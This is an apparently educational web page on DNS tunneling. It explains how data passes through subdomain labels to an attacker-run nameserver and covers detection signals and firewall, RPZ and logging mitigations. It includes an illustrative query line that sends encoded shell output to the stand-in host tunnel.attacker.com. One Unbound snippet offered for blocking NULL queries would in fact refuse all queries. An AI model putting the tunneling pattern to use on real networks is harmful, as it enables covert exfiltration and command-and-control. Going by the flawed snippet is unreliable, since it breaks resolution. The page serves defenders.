← DNS SecurityThreat / High

DNS Tunneling

Encoding arbitrary data inside DNS queries and responses to establish covert communication channels — bypassing firewalls that freely allow DNS traffic.

The Attack

DNS as a Covert Channel

DNS is one of the few protocols allowed through almost every network perimeter. Organizations that block HTTP, HTTPS, and all other outbound protocols still typically allow DNS on port 53. DNS tunneling exploits this by encoding arbitrary data — commands, exfiltrated files, shell sessions — inside DNS query labels and response records.

A DNS tunnel requires two components: a client (the compromised host inside the network) that encodes data in DNS queries, and a server (attacker-controlled authoritative nameserver) that decodes those queries and responds with encoded data in DNS responses. Since the resolver forwards queries to the authoritative nameserver, the data passes through the network boundary invisibly.

Use cases range from data exfiltration and command-and-control (C2) for malware, to circumventing hotel/airport captive portals (tools like iodine allow free internet via DNS when HTTP is restricted).

Why DNS Firewalls Aren't EnoughA firewall that simply allows DNS traffic on port 53 cannot distinguish legitimate DNS from tunneled data. DNS tunneling typically uses valid DNS syntax — the data is encoded in subdomain labels using base32 or base64. Content inspection is required to detect it.
; DNS tunnel query example (iodine) ; Data encoded as subdomain labels: ; Client sends: AEBAGBAFAYDQQCIKBMGA.tunnel.attacker.com A ; That base32-encoded label contains ; binary data (e.g., shell command output) ; Server responds with: tunnel.attacker.com TXT "MFRA...." ; more base32 data
Mechanics

How DNS Tunneling Works

1

Setup: attacker registers a domain

The attacker registers a domain (e.g., tunnel.attacker.com) and points its NS records to their own nameserver. This nameserver runs tunnel server software (iodine, dnscat2, DNSCat).

2

Client encodes data in DNS queries

The tunnel client on the compromised machine base32/base64-encodes data and splits it across subdomain labels in a query: ENCODEDDATA1.ENCODEDDATA2.tunnel.attacker.com. Each label can be up to 63 characters.

3

Resolver forwards query through firewall

The corporate resolver forwards the query to the root, TLD, and then the attacker's authoritative nameserver — passing all the encoded data through the firewall silently.

4

Server decodes and responds

The attacker's nameserver decodes the data, processes the command or stores the exfiltrated data, and encodes a response in a TXT, CNAME, or NULL record.

5

Bidirectional channel established

By repeating this process, a full bidirectional channel is created. Bandwidth is limited (~1-3 KB/s typically) but sufficient for shell commands, key logging, or slow exfiltration of sensitive files over time.

Detection

Identifying DNS Tunneling Traffic

DNS tunneling leaves distinctive signatures in query logs

Abnormal query volume

A typical host makes a few hundred DNS queries per day. DNS tunneling generates thousands of queries per minute. Monitor per-host query rates and alert on hosts exceeding 500+ queries/hour to a single domain.

Unusually long subdomain labels

Legitimate DNS queries rarely have subdomains longer than 30 characters. Tunnel-encoded subdomains are typically 50–63 characters of random-looking base32/base64 text. Query length distribution analysis catches this.

High subdomain entropy

Encoded binary data has high Shannon entropy — the label looks like random characters rather than human-readable words. Tools like DGA/tunnel detectors calculate entropy per label and flag statistical outliers.

Rare query types: TXT, NULL, CNAME

DNS tunnels often use TXT or NULL record types for the response channel (they carry arbitrary data). Monitoring for unusual TXT query volumes from internal hosts is an effective low-noise detection signal.

Single apex domain with many unique subdomains

Legitimate CDNs reuse a small set of subdomains. Tunnel traffic generates a constantly-changing stream of unique subdomains under a single apex. Track unique subdomain count per apex per hour.

Low-TTL responses from unknown domains

Tunnel servers often set very low TTLs (0–1 second) to prevent caching. Flag apex domains that consistently return TTL=0 combined with high unique subdomain counts.

Mitigations

Preventing and Blocking DNS Tunneling

DNS Firewall / RPZ (Response Policy Zones)

# BIND RPZ configuration zone "rpz" { type master; file "rpz.db"; }; options { response-policy { zone "rpz"; }; }; ; rpz.db — block tunnel domains tunnel.attacker.com CNAME . ; NXDOMAIN

Restrict to known-good resolver

# Block outbound DNS except to # your controlled resolver # (iptables / firewall) iptables -A OUTPUT -p udp --dport 53 \ ! -d 192.0.2.53 -j DROP iptables -A OUTPUT -p tcp --dport 53 \ ! -d 192.0.2.53 -j DROP

Log and analyze with a SIEM

# Enable full DNS query logging # (bind9 querylog) named.conf: querylog yes; # Ship to SIEM (e.g., Splunk) # Detect: > 500 unique subdomains # per apex per hour

Block suspicious query types

# Block NULL record queries at # firewall or resolver level # (rarely used legitimately) # Unbound — block NULL type local-zone: "." refuse # Or use RPZ for targeted blocks

Related Topics

DNS Amplification

Open resolvers exploited for amplification attacks are also the conduit for tunneling traffic.

DNS Hijacking

Tunneling requires DNS resolution to reach attacker infrastructure — hijacked DNS breaks the channel.

TXT Record

TXT queries carry the most data per response, making them a common vehicle for tunneled payloads.